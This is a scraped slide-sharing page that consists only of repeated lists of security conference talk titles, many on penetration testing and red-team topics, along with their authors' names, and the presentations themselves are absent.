External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointAndrew McNicol
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointAndrew McNicol
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterMike Felch
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesDaniel Bohannon
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 lokeshpidawekar
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Andrew McNicol
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersAndrew McNicol
 

What's hot (20)

Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPoint
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT Signatures
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
Revoke-Obfuscation
Revoke-ObfuscationRevoke-Obfuscation
Revoke-Obfuscation
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathers
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 

Viewers also liked

HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010Chris Gates
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Chris Gates
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 
MSF Auxiliary Modules
MSF Auxiliary ModulesMSF Auxiliary Modules
MSF Auxiliary ModulesChris Gates
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackersChris Gates
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Chris Gates
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration TestersChris Gates
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops Chris Gates
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 

Viewers also liked (14)

HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
MSF Auxiliary Modules
MSF Auxiliary ModulesMSF Auxiliary Modules
MSF Auxiliary Modules
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 

Similar to hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2

Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedOctavio Paguaga
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server SecurityBrian Pontarelli
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesFelipe Prado
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryFelipe Prado
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdNipun Jaswal
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Xavier Ashe
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...in.security Ltd.
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiYossi Sassi
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Paul Haskell-Dowland
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton
 

Similar to hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2 (20)

Bsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicatedBsidesnova- Pentesting Methodology - Making bits less complicated
Bsidesnova- Pentesting Methodology - Making bits less complicated
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
 
Azure from scratch part 4
Azure from scratch part 4Azure from scratch part 4
Azure from scratch part 4
 
2023-May.pptx
2023-May.pptx2023-May.pptx
2023-May.pptx
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT DevicesFIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE Wednesday Webinars - How to Secure IoT Devices
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted ...
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 

More from Chris Gates

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVChris Gates
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018Chris Gates
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) Chris Gates
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
 
Open Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionOpen Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionChris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsChris Gates
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfSOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfChris Gates
 
Hacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitHacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitChris Gates
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 

More from Chris Gates (11)

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
 
Open Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon EditionOpen Source Information Gathering Brucon Edition
Open Source Information Gathering Brucon Edition
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security EnvironmentsBig Bang Theory: The Evolution of Pentesting High Security Environments
Big Bang Theory: The Evolution of Pentesting High Security Environments
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXfSOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
 
Hacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With MetasploitHacking Oracle Web Applications With Metasploit
Hacking Oracle Web Applications With Metasploit
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 

Recently uploaded

The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 

Recently uploaded (20)

The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
